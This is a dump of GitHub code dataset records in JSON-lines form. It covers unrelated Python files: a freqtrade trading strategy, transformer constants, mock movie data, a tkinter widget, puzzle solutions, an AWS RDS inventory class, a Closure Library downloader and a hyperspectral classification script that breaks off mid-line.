conditions:\r\n dataframe.loc[\r\n reduce(lambda x, y: x | y, conditions),\r\n 'sell'\r\n ]=1\r\n\r\n return dataframe\r\n\r\n #\"\"\r\n def custom_sell(self, pair: str, trade: Trade, current_time: datetime, current_rate: float,\r\n current_profit: float, **kwargs):\r\n dataframe, _ = self.dp.get_analyzed_dataframe(pair, self.timeframe)\r\n last_candle = dataframe.iloc[-1].squeeze()\r\n\r\n # only neg\r\n #if current_profit < -0.1:\r\n # if last_candle['hiddenBearCond'] == 1:\r\n # return 'Hidden_Bear_div_loss'\r\n\r\n #if current_profit < -0.1:\r\n # if last_candle['bearCond'] == 1:\r\n # return 'Bear on neg'\r\n\r\n #only pos\r\n if current_profit > 0:\r\n if last_candle['hiddenBearCond'] == 1:\r\n return 'Hidden_Bear_div_profit'\r\n\r\n if current_profit > 0:\r\n if last_candle['bearCond'] == 1:\r\n return 'Bear_div_profit'\r\n\r\n # both\r\n #if current_profit > 0 or current_profit < -0.01:\r\n # if last_candle['hiddenBearCond'] == 1:\r\n # return 'Hidden_Bear'\r\n\r\n #if current_profit > 0 or current_profit < -0.01:\r\n # if last_candle['bearCond'] == 1:\r\n # return 'Bear'\r\n\r\n\r\n return None\r\n #\"\"\r\n\r\n\r\n\r\n\r\nclass SMAoffset_antipump_div(custom):\r\n\r\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\r\n conditions = []\r\n dont_buy_conditions = []\r\n\r\n dont_buy_conditions.append(\r\n (dataframe['pump_strength'] > self.antipump_threshold.value) &\r\n (dataframe['bearCond'] < 1) &\r\n (dataframe['hiddenBearCond'] < 1)\r\n )\r\n #\"\"\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['sma_9'] < dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'])&\r\n (dataframe['rsi_fast'] <35)&\r\n (dataframe['rsi_fast'] >4)&\r\n (dataframe['close'] < (dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'] * self.low_offset.value)) &\r\n (dataframe['EWO'] > self.ewo_high.value) &\r\n (dataframe['rsi'] < self.rsi_buy.value) &\r\n (dataframe['volume'] > 0)&\r\n (dataframe['close'] < (dataframe[f'ma_sell_{self.base_nb_candles_sell.value}'] * self.high_offset.value))\r\n )\r\n )\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['sma_9'] < dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'])&\r\n (dataframe['rsi_fast'] <35)&\r\n (dataframe['rsi_fast'] >4)&\r\n (dataframe['close'] < (dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'] * self.low_offset_2.value)) &\r\n (dataframe['EWO'] > self.ewo_high_2.value) &\r\n (dataframe['rsi'] < self.rsi_buy.value) &\r\n (dataframe['volume'] > 0)&\r\n (dataframe['close'] < (dataframe[f'ma_sell_{self.base_nb_candles_sell.value}'] * self.high_offset.value))&\r\n (dataframe['rsi']<25)\r\n )\r\n )\r\n\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['sma_9'] < dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'])&\r\n (dataframe['rsi_fast'] < 35)&\r\n (dataframe['rsi_fast'] >4)&\r\n (dataframe['close'] < (dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'] * self.low_offset.value)) &\r\n (dataframe['EWO'] < self.ewo_low.value) &\r\n (dataframe['volume'] > 0)&\r\n (dataframe['close'] < (dataframe[f'ma_sell_{self.base_nb_candles_sell.value}'] * self.high_offset.value))\r\n )\r\n )\r\n #\"\"\r\n\r\n #SMAOffsetProtectOptV1\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['close'] < (dataframe[f'ma_buy2_{self.base_nb_candles_buy2.value}'] * self.low_offset2.value)) &\r\n (dataframe['EWO'] > self.ewo_high2.value) &\r\n (dataframe['rsi'] < self.rsi_buy2.value) &\r\n (dataframe['volume'] > 0)\r\n )\r\n )\r\n\r\n #\"\"\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['close'] < (dataframe[f'ma_buy2_{self.base_nb_candles_buy2.value}'] * self.low_offset2.value)) &\r\n (dataframe['EWO'] < self.ewo_low2.value) &\r\n (dataframe['volume'] > 0)\r\n )\r\n )\r\n #\"\"\r\n\r\n if conditions:\r\n dataframe.loc[\r\n reduce(lambda x, y: x | y, conditions),\r\n 'buy'\r\n ]=1\r\n\r\n if dont_buy_conditions:\r\n for condition in dont_buy_conditions:\r\n dataframe.loc[condition, 'buy'] = 0\r\n\r\n return dataframe\r\n\r\n\r\n\r\n \"\"\"\r\n Custom Stoploss\r\n \"\"\"\r\n def custom_stoploss_test(self, pair: str, trade: 'Trade', current_time: datetime,\r\n current_rate: float, current_profit: float, **kwargs) -> float:\r\n sl_new = 1\r\n\r\n if not self.config['runmode'].value in ('backtest', 'hyperopt'):\r\n dataframe, _ = self.dp.get_analyzed_dataframe(pair, self.timeframe)\r\n if(len(dataframe) >= 1):\r\n last_candle = dataframe.iloc[-1]\r\n if((last_candle['sell_copy'] == 1) & (last_candle['buy_copy'] == 0)):\r\n sl_new = 0.001\r\n\r\n return sl_new\r\n\r\n\r\n def custom_stoploss(self, pair: str, trade: 'Trade', current_time: datetime, current_rate: float, current_profit: float, **kwargs) -> float:\r\n\r\n trade_dur = int((current_time.timestamp() - trade.open_date_utc.timestamp()) // 60)\r\n\r\n if self.config['runmode'].value in ('live', 'dry_run'):\r\n dataframe, last_updated = self.dp.get_analyzed_dataframe(pair=pair, timeframe=self.timeframe)\r\n sroc = dataframe['sroc'].iat[-1]\r\n # If in backtest or hyperopt, get the indicator values out of the trades dict (Thanks @JoeSchr!)\r\n else:\r\n sroc = self.custom_trade_info[trade.pair]['sroc'].loc[current_time]['sroc']\r\n\r\n if current_profit < self.cstp_threshold.value:\r\n if self.cstp_bail_how.value == 'roc' or self.cstp_bail_how.value == 'any':\r\n # Dynamic bailout based on rate of change\r\n if (sroc/100) <= self.cstp_bail_roc.value:\r\n return 0.001\r\n if self.cstp_bail_how.value == 'time' or self.cstp_bail_how.value == 'any':\r\n # Dynamic bailout based on time\r\n if trade_dur > self.cstp_bail_time.value:\r\n return 0.001\r\n\r\n return 1\r\n\r\ndef valuewhen(dataframe, condition, source, occurrence):\r\n copy = dataframe.copy()\r\n copy['colFromIndex'] = copy.index\r\n copy = copy.sort_values(by=[condition, 'colFromIndex'], ascending=False).reset_index(drop=True)\r\n copy['valuewhen'] = np.where(copy[condition] > 0, copy[source].shift(-occurrence), 100)\r\n copy['valuewhen'] = copy['valuewhen'].fillna(100)\r\n copy['barrsince'] = copy['colFromIndex'] - copy['colFromIndex'].shift(-occurrence)\r\n copy.loc[\r\n (\r\n (rangeLower <= copy['barrsince']) &\r\n (copy['barrsince'] <= rangeUpper)\r\n )\r\n , \"in_range\"] = 1\r\n copy['in_range'] = copy['in_range'].fillna(0)\r\n copy = copy.sort_values(by=['colFromIndex'], ascending=True).reset_index(drop=True)\r\n return copy['valuewhen'], copy['in_range']\r\n\r\ndef EWO(dataframe, ema_length=5, ema2_length=35):\r\n df = dataframe.copy()\r\n ema1 = ta.EMA(df, timeperiod=ema_length)\r\n ema2 = ta.EMA(df, timeperiod=ema2_length)\r\n emadif = (ema1 - ema2) / df['close'] * 100\r\n return emadif\r\n\r\ndef RMI(dataframe, *, length=20, mom=5):\r\n df = dataframe.copy()\r\n\r\n df['maxup'] = (df['close'] - df['close'].shift(mom)).clip(lower=0)\r\n df['maxdown'] = (df['close'].shift(mom) - df['close']).clip(lower=0)\r\n\r\n df.fillna(0, inplace=True)\r\n\r\n df[\"emaInc\"] = ta.EMA(df, price='maxup', timeperiod=length)\r\n df[\"emaDec\"] = ta.EMA(df, price='maxdown', timeperiod=length)\r\n\r\n df['RMI'] = np.where(df['emaDec'] == 0, 0, 100 - 100 / (1 + df[\"emaInc\"] / df[\"emaDec\"]))\r\n\r\n return df[\"RMI\"]\r\n\r\ndef SROC(dataframe, roclen=21, emalen=13, smooth=21):\r\n df = dataframe.copy()\r\n\r\n roc = ta.ROC(df, timeperiod=roclen)\r\n ema = ta.EMA(df, timeperiod=emalen)\r\n sroc = ta.ROC(ema, timeperiod=smooth)\r\n\r\n return sroc\r\n","repo_name":"davidzr/freqtrade-strategies","sub_path":"strategies/custom/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":27227,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"38134799727","text":"\nPAD = 0\nUNK = 1\nBOS = 2\nEOS = 3\n\nPAD_WORD = '<blank>'\nUNK_WORD = '<unk>'\nBOS_WORD = '<s>'\nEOS_WORD = '</s>'\n\nCLIP_SIZE_Q = 4\nCLIP_SIZE_R = 3\nCLIP_SIZE_O = 2\n\n\n#CUDA_VISIBLE_DEVICES=2 python train_origin.py -data_type Trans -learning_rate 0.012 -n_warmup_steps 180000 -batch_size 2\n\n#CUDA_VISIBLE_DEVICES=0 python train_origin.py -data_type FrameQA -learning_rate 0.01 -n_warmup_steps 12000 -batch_size 6 -dropout 0.1\n\n#CUDA_VISIBLE_DEVICES=3 python train_origin.py -data_type Action -learning_rate 0.04 -n_warmup_steps 70000 -batch_size 4 -n_layers 2 -dropout 0.15\n\n#CUDA_VISIBLE_DEVICES=0 python train_origin.py -data_type Count -learning_rate 0.002 -n_warmup_steps 10000 -batch_size 6 -n_layers 2 \n","repo_name":"axcyoung/graph_vqa","sub_path":"transformer/Constants.py","file_name":"Constants.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11179864658","text":"import uuid\nimport random\n\nmovies = [{\n 'id': str(uuid.uuid4()),\n 'imdb_rating': round(random.random() * 10, 1),\n 'genre': [\n {'id': '789', 'name': 'Action'},\n {'id': '546', 'name': 'Music Story'}\n ],\n 'title': 'The Star',\n 'description': 'New World',\n 'directors': [\n {'id': '1', 'name': 'Jack Jones'},\n {'id': '2', 'name': 'Steven Spielberg'}\n ],\n 'actors_names': ['Jack Jones', 'Robbie Williams'],\n 'writers_names': ['Jack Jones', 'Serena Williams'],\n 'actors': [\n {'id': '1', 'name': 'Jack Jones'},\n {'id': '3', 'name': 'Robbie Williams'}\n ],\n 'writers': [\n {'id': '1', 'name': 'Jack Jones'},\n {'id': '4', 'name': 'Serena Williams'}\n ],\n} for _ in range(60)]\n\ngenres = [\n {\n 'id': '789',\n 'name': 'Action',\n 'description': 'Action description'\n },\n {\n 'id': '123',\n 'name': 'Fantasy',\n 'description': 'Fantasy description!'\n },\n {\n 'id': '456',\n 'name': 'Music Story',\n 'description': 'Music description'\n }\n]\n\npersons = [\n {\n 'id': '1',\n 'full_name': 'Jack Jones',\n },\n {\n 'id': '2',\n 'full_name': 'Steven Spielberg',\n },\n {\n 'id': '3',\n 'full_name': 'Robbie Williams'\n },\n {\n 'id': '4',\n 'full_name': 'Serena Williams'\n },\n {\n 'id': '5',\n 'full_name': 'Lev Tolstoj'\n },\n {\n 'id': '6',\n 'full_name': 'Gabriel Garcia Markes'\n }\n]\n\ndata = {'movies': movies, 'genres': genres, 'persons': persons}\n\n","repo_name":"dkarpele/Auth_sprint_2","sub_path":"content_api/tests/functional/testdata/es_data.py","file_name":"es_data.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27958306565","text":"from tkinter import *\nfrom tkinter.ttk import Combobox\nfrom include.custom_spinbox import CustomSpinbox\nfrom ..helper import dummy\n\n\nclass TimeSigFrame(LabelFrame):\n\n def __init__(self, parent, cb=dummy):\n LabelFrame.__init__(self, parent, text=\"Time Signature\", padx=4, pady=5)\n self.cb = cb\n\n self._init_ui()\n\n def _init_ui(self):\n self.beat_count_spinbox = CustomSpinbox(self, start=4, from_=1, to=99, width=3)\n self.beat_count_spinbox.on_value_change(self._forward)\n\n self._beat_unit_var = StringVar()\n values = [str(2 ** i) for i in range(1, 6)]\n self.beat_unit_combobox = Combobox(\n self, values=values, width=3,\n textvariable=self._beat_unit_var,\n state='readonly')\n self._beat_unit_var.set('4')\n self._beat_unit_var.trace('w', self._forward)\n\n self.sep_label = Label(self, text='/')\n\n self.beat_count_spinbox.grid(row=0, column=0, sticky=W)\n self.sep_label.grid(row=0, column=1, sticky=W+N+E+S)\n self.beat_unit_combobox.grid(row=0, column=2, sticky=E)\n self.grid_columnconfigure(1, weight=1)\n\n def _forward(self, *args):\n beat_count = int(self.beat_count_spinbox.get())\n beat_unit = int(self.beat_unit_combobox.get())\n self.cb((beat_count, beat_unit))\n\n def set_timesig(self, timesig):\n beat_count, beat_unit = timesig\n self.beat_count_spinbox.set(beat_count)\n self.beat_unit_combobox.set(beat_unit)","repo_name":"yippp/tk-piano-roll","sub_path":"src/views/timesig_frame.py","file_name":"timesig_frame.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6025690159","text":"\"\"\"\nA number chain is created by continuously adding the square of the digits in a number to form a new number until it has been seen before.\n\nFor example,\n\n44 → 32 → 13 → 10 → 1 �� 1\n85 → 89 → 145 → 42 → 20 → 4 → 16 → 37 → 58 → 89\n\nTherefore any chain that arrives at 1 or 89 will become stuck in an endless loop. What is most amazing is that EVERY starting number will eventually arrive at 1 or 89.\n\nHow many starting numbers below ten million will arrive at 89?\n\n\"\"\"\n\nimport timeit\n\nstart = timeit.default_timer()\n\nsquares = {str(i): i**2 for i in range(10)}\nmemo = {}\nfor i in range(1, 600):\n x = i\n while x != 89 and x != 1:\n x = sum(map(squares.get, str(x)))\n memo[i] = 1 if x == 89 else 0\n\ncount = 0\nfor i in range(1, 10000000):\n count += memo[sum(map(squares.get, str(i)))]\n\nprint(count)\nstop = timeit.default_timer()\nprint('Runtime:', stop - start)","repo_name":"tomlinsonk/euler","sub_path":"problem092/problem092.py","file_name":"problem092.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8644356736","text":"import te.lang.cce\nfrom te import tvm\nfrom te.platform.fusion_manager import fusion_manager\nfrom topi import generic\nfrom topi.cce import util\n\n\n@fusion_manager.register(\"segment_prod\")\ndef segment_prod_compute(input_x, input_y, output_y, kernel_name=\"segment_prod\"):\n \"\"\"\n calculating data\n\n Parameters\n ----------\n input_x : TVM tensor\n the placeholder of input_x\n input_y : list\n segment_ids\n output_y : dict\n dict of output_y, include keys(shape and dtype)\n kernel_name : str\n kernel name, default value is \"segment_prod\"\n\n Returns\n -------\n res : output of the data`s segment_prod, shape is (input_y[-1]+1, XXX),\n XXX is the same as input_x shape from the second dimension to the end dimension\n \"\"\"\n\n res = te.lang.cce.unsorted_segment_prod(input_x, input_y, input_y[-1]+1, init_value=1)\n return res\n\n\n@util.check_input_type(dict, list, dict, str)\ndef segment_prod(input_data, segment_ids, output_data, kernel_name=\"segment_prod\"):\n \"\"\"\n algorithm: segment_prod\n calculating data\n\n Parameters\n ----------\n input_data : dict\n shape and dtype of first input, only support float16, float32\n segment_ids : list\n shape and dtype of second input, only support int32\n size is equal to the size of input_data first dimension\n values should be sorted and can be repeated\n output_data : dict\n shape and dtype of output,\n kernel_name : str\n kernel name, default value is \"segment_prod\"\n\n Returns\n -------\n None\n \"\"\"\n\n shape_data = input_data.get(\"shape\")\n shape_segment = (len(segment_ids),)\n dtype_data = input_data.get(\"dtype\").lower()\n\n util.check_kernel_name(kernel_name)\n util.check_shape_rule(shape_data)\n util.check_shape_rule(shape_segment)\n util.check_tensor_shape_size(shape_data)\n util.check_tensor_shape_size(shape_segment)\n\n check_tuple_data = (\"float16\", \"float32\", \"int8\", \"int32\")\n util.check_dtype_rule(dtype_data, check_tuple_data)\n\n if shape_segment[0] != shape_data[0]:\n raise RuntimeError(\"the size od input_segment should equal to the size of data's first dimension\")\n\n for i in range(shape_segment[0]):\n if not isinstance(segment_ids[i], int):\n raise RuntimeError(\"input_segment should be 1-D and all int!\")\n if segment_ids[i] < 0:\n raise RuntimeError(\"input_segment should not be less than 0!\")\n if i > 0 and segment_ids[i] < segment_ids[i - 1]:\n raise RuntimeError(\"input_segment not be sorted\")\n\n if dtype_data == \"int8\":\n data_input = tvm.placeholder(shape_data, name=\"data_input\", dtype=\"float16\")\n res = segment_prod_compute(data_input, segment_ids, output_data, kernel_name)\n res = te.lang.cce.cast_to(res, \"int8\")\n else:\n data_input = tvm.placeholder(shape_data, name=\"data_input\", dtype=dtype_data)\n res = segment_prod_compute(data_input, segment_ids, output_data, kernel_name)\n\n\n with tvm.target.cce():\n schedule = generic.auto_schedule(res)\n\n config = {\"name\": kernel_name,\n \"tensor_list\": [data_input, res]}\n\n te.lang.cce.cce_build_code(schedule, config)\n","repo_name":"gekowa/ascend-opp","sub_path":"op_impl/built-in/ai_core/tbe/impl/segment_prod.py","file_name":"segment_prod.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26631735758","text":"global subprocess\nglobal os, time\n\nimport subprocess\nimport os, time\n\ndef verificar_ram():\n\tresultado = subprocess.run(['free', '-m'], capture_output=True, text=True)\n\tsaida = resultado.stdout.strip().split('\\n')\n\tcabecalho = saida[0].split()\n\tvalores = saida[1].split()\n\n\tram_total = int(valores[1])\n\tram_usada = int(valores[2])\n\tram_livre = int(valores[3])\n\n\tprint(f\"Informations for RAM Memory:\\n\")\n\tprint(f\"Installed: {ram_total} MB\")\n\tprint(f\"Used: {ram_usada} MB\")\n\tprint(f\"Free: {ram_livre} MB\")\n\nif os.name == \"posix\":\n\twhile True:\n\t\ttry: os.system(\"clear\"), verificar_ram(), time.sleep(0.6)\n\t\texcept (KeyboardInterrupt, EOFError): break\n\nelse: print(\"ram: only avaliable for Linux systems.\")\n\n","repo_name":"fetuber4095/OpenTTY","sub_path":"xbin/ram.py","file_name":"ram.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21391567337","text":"# Service RDS\n\n#\n# Imports\n#\n# from .Aws import Aws\nfrom ..AwsService import AwsService\nfrom .instance.Instance import Instance\nfrom ...Console import console\n\n#\n# Classe Rds\n#\nclass Rds(AwsService):\n _db_instance_increments :list # Liste des increments d'instances RDS utilises\n _config : dict # Configuration du service AWS\n\n def __init__(self, config :dict={}):\n config[\"id\"] = \"rds\"\n config[\"name\"] = \"RDS\"\n config[\"resource_types\"] = [\"db_instance\"]\n if \"filters\" in config:\n if \"resource_types\" in config[\"filters\"]:\n config[\"resource_types\"] = config[\"filters\"][\"resource_types\"]\n self._is_regional = True\n super().__init__(config=config)\n \n self._db_instance_increments = []\n \n def LoadResources(self) -> dict:\n nb_instances = 0\n self._resources['all'] = {}\n for my_client in self._clients:\n nb_resources_client = 0\n console.Debug(f\" Chargement : {my_client.Name()}\", newline=False)\n\n for my_resource_type in self._config[\"resource_types\"]:\n if my_resource_type == \"db_instance\":\n nb_instances = 0\n\n for my_instance in my_client.Client().describe_db_instances()['DBInstances']:\n nb_instances = nb_instances + 1\n\n new_resource = Instance(instance=my_instance, client=my_client) # type: ignore\n new_resource.SetProperty('profile', my_client.Profile())\n\n self._resources[my_resource_type][new_resource.Id()] = new_resource\n self._resources['all'][new_resource.Id()] = new_resource\n nb_resources_client += 1\n\n if not new_resource.GetProperty('increment') in self._db_instance_increments:\n self._db_instance_increments.append(new_resource.GetProperty('increment'))\n self._summary['instances'] = str(nb_instances)\n console.Debug(f\" ==> {nb_resources_client} resources.\")\n\n return self._resources\n\n def NextInstanceIncrement(self):\n if len(self._db_instance_increments) > 0:\n for i in range(1, max(self._db_instance_increments)):\n if not i in self._db_instance_increments:\n return i\n return len(self._db_instance_increments) + 1\n\n def Print(self):\n self._summary['increment disponible'] = self.NextInstanceIncrement()\n super().Print()\n","repo_name":"espadrille/inventory","sub_path":"inventory/aws/rds/Rds.py","file_name":"Rds.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39221045941","text":"import logging\nimport os\nimport shutil\nimport tempfile\nimport zipfile\nimport googkit.lib.clone\nimport googkit.lib.path\nfrom googkit.commands.command import Command\nfrom googkit.compat.urllib import request\nfrom googkit.lib.dirutil import working_directory\nfrom googkit.lib.error import GoogkitError\nfrom googkit.lib.i18n import _\n\n\nclass DownloadCommand(Command):\n @classmethod\n def needs_project_config(cls):\n return True\n\n def download_closure_library(self):\n \"\"\"Downloads Closure Library resources to the library root that defined in a config file.\n \"\"\"\n library_repos = self.config.library_repos()\n library_root = self.config.library_root()\n\n logging.info(_('Downloading Closure Library...'))\n\n try:\n googkit.lib.clone.run(library_repos, library_root)\n except GoogkitError as e:\n raise GoogkitError(\n _('Dowloading Closure Library failed: {message}').format(\n message=str(e)))\n\n logging.info('Done.')\n\n def download_closure_compiler(self):\n \"\"\"Downloads Closure Compiler resources to the compiler root that defined in a config file.\n \"\"\"\n tmp_path = tempfile.mkdtemp()\n compiler_zip = os.path.join(tmp_path, 'compiler.zip')\n compiler_zip_url = self.config.compiler_zip()\n\n logging.info(_('Downloading Closure Compiler...'))\n\n try:\n request.urlretrieve(compiler_zip_url, compiler_zip)\n except IOError as e:\n raise GoogkitError(\n _('Dowloading Closure Compiler failed: {message}').format(\n massage=str(e)))\n\n compiler_root = self.config.compiler_root()\n\n os.path.join('tools', 'sub', 'unzip.py')\n\n with zipfile.ZipFile(compiler_zip) as z:\n z.extractall(compiler_root)\n\n shutil.rmtree(tmp_path)\n\n logging.info(_('Done.'))\n\n def run_internal(self):\n project_root = googkit.lib.path.project_root(self.env.cwd)\n with working_directory(project_root):\n self.download_closure_library()\n self.download_closure_compiler()\n","repo_name":"googkit/googkit","sub_path":"googkit/commands/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"20942958657","text":"# Given an array of integers nums and an integer target, return indices of the t\n# wo numbers such that they add up to target. \n# \n# You may assume that each input would have exactly one solution, and you may n\n# ot use the same element twice. \n# \n# You can return the answer in any order. \n# \n# \n# Example 1: \n# \n# \n# Input: nums = [2,7,11,15], target = 9\n# Output: [0,1]\n# Explanation: Because nums[0] + nums[1] == 9, we return [0, 1].\n# \n# \n# Example 2: \n# \n# \n# Input: nums = [3,2,4], target = 6\n# Output: [1,2]\n# \n# \n# Example 3: \n# \n# \n# Input: nums = [3,3], target = 6\n# Output: [0,1]\n# \n# \n# \n# Constraints: \n# \n# \n# 2 <= nums.length <= 104 \n# -109 <= nums[i] <= 109 \n# -109 <= target <= 109 \n# Only one valid answer exists. \n# \n# \n# \n# Follow-up: Can you come up with an algorithm that is less than O(n2) time comp\n# lexity? Related Topics Array Hash Table \n# ðŸ‘� 29659 👎 938\n\n\nclass Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n temp_dict = {}\n for i in range(len(nums)):\n complement = target - nums[i]\n if complement in temp_dict:\n return [i, nums.index(complement)]\n temp_dict[nums[i]] = i\n return []\n\n\ndef _test():\n input_list = [2,7,11,15]\n target = 9\n result = Solution().twoSum(input_list, target)\n print(\"input list: \",input_list, \"target: \",target, \"result: \", result)\n\n\nif __name__ == '__main__':\n _test()\n","repo_name":"sportzhang/Algorithm","sub_path":"leetcode/editor/en/[1]Two Sum.py","file_name":"[1]Two Sum.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18839389421","text":"from flask import Flask, render_template, session, redirect, url_for, request\nfrom plotly.offline import plot\nfrom plotly.graph_objs import *\nfrom flask import Markup\nfrom co2_chart import CO2_graph\nfrom utils import FBProphet_forecast_plot, VAR_forecast_plot, SARIMA_forecast_plot\nfrom plotly.subplots import make_subplots\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n\n my_plot_div = plot(CO2_graph(), output_type='div')\n\n return render_template('Index.html', div_placeholder=Markup(my_plot_div))\n\n@app.route('/VAR')\ndef var():\n return render_template('VAR_dash.html') #context object would have country\n\n@app.route('/SARIMA')\ndef sarima():\n return render_template('SARIMA_dash.html')\n\n@app.route('/FBProphet')\ndef FBProphet():\n return render_template('FBProphet_dash.html')\n\n\n@app.route('/FBProphet/<country>')\ndef FBProphet_country(country):\n if request.args.get('number_years'):\n years = int(request.args.get('number_years'))\n my_plot_div = plot(FBProphet_forecast_plot(country, years), output_type='div')\n return render_template('FBProphet_dash.html', country=country, years = years,\n div_placeholder = Markup(my_plot_div))\n else:\n return render_template('FBProphet_dash.html',country=country)\n\n@app.route('/VAR/<country>')\ndef VAR_country(country):\n if request.args.get('number_years'):\n years=int(request.args.get('number_years'))\n my_plot_div = plot(VAR_forecast_plot(country,years), output_type='div')\n return render_template('VAR_dash.html', country=country, years=years,\n div_placeholder=Markup(my_plot_div))\n else:\n return render_template('VAR_dash.html', country=country)\n\n@app.route('/SARIMA/<country>')\ndef SARIMA_country(country):\n if request.args.get('number_years'):\n years = int(request.args.get('number_years'))\n my_plot_div = plot(SARIMA_forecast_plot(country, years), output_type='div')\n return render_template('SARIMA_dash.html', country=country, years=years,\n div_placeholder=Markup(my_plot_div))\n\n else:\n return render_template('SARIMA_dash.html', country=country)\n\n\nif __name__ == '__main__':\n app.run(debug = True)\n","repo_name":"Ayshnoor/GA_CO2_forecasting","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23241117185","text":"# 给你一个由 '1'(陆地)和 '0'(水)组成的的二维网格,请你计算网格中岛屿的数量。\n#\n# 岛屿总是被水包围,并且每座岛屿只能由水平方向和/或竖直方向上相邻的陆地连接形成。\n#\n# 此外,你可以假设该网格的四条边均被水包围。\n#\n\ngrid = [\n [\"1\",\"1\",\"1\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"0\",\"0\"]\n]\n\n# 深度优先搜索\nclass Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n numRows = len(grid)\n numCols = len(grid[0])\n count = 0\n\n def dfs(grid, i, j):\n if i < 0 or i > numRows - 1 or j < 0 or j > numCols - 1:\n return\n if grid[i][j] == \"1\":\n grid[i][j] = \"0\"\n dfs(grid, i - 1, j)\n dfs(grid, i + 1, j)\n dfs(grid, i, j - 1)\n dfs(grid, i, j + 1)\n\n for i in range(numRows):\n for j in range(numCols):\n if grid[i][j] == \"1\":\n count += 1\n dfs(grid, i, j)\n\n return count\n\n\"\"\"\n# 二刷,dfs\nclass Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n numRows = len(grid)\n numCols = len(grid[0])\n count = 0\n\n def dfs(i, j):\n grid[i][j] = \"0\"\n # 上\n if i > 0 and grid[i - 1][j] == \"1\":\n dfs(i - 1, j)\n # 下\n if i < numRows - 1 and grid[i + 1][j] == \"1\":\n dfs(i + 1, j)\n # 左\n if j > 0 and grid[i][j - 1] == \"1\":\n dfs(i, j - 1)\n # 右\n if j < numCols - 1 and grid[i][j + 1] == \"1\":\n dfs(i, j + 1)\n \n for i in range(numRows):\n for j in range(numCols):\n if grid[i][j] == \"1\":\n count += 1\n dfs(i, j)\n return count\n\"\"\"","repo_name":"vandeppce/algorithm","sub_path":"12.graph/200NumIslands.py","file_name":"200NumIslands.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"307019096","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 11 14:00:52 2022\n\n@author: Stian\n\"\"\"\n\n# Find map based on field work\n\n\nfrom PIL import Image\nimport numpy as np\nimport pandas as pd\nimport spectral\nimport matplotlib.pyplot as plt\n\nimport spectral.io.envi as envi\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.decomposition import PCA\n\nfrom matplotlib import cm\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.pipeline import make_pipeline\n\nfrom mycolorpy import colorlist as mcp\n\nbreak\n\n# =============================================================================\n# Load data labels\n# =============================================================================\n\nspec_lib = envi.open(\"E:/M-DV-STeien/juni2021/04/hs/2021_04_roofs_classes.hdr\")\narea = spec_lib.asarray()\narea = area.reshape(area.shape[0], area.shape[1])\n\nroofs = Image.open(\"E:/M-DV-STeien/databaseFKB2019/04/04_bygning_30cm.tif\")\nroofs = np.array(roofs)\n\n# =============================================================================\n# Load data HS \n# =============================================================================\n\nvnir_raw = spectral.open_image(\"E:/M-DV-STeien/juni2021/04/hs/VNIR30cm/2021_04_vnir30cm.hdr\")\nswir_raw = 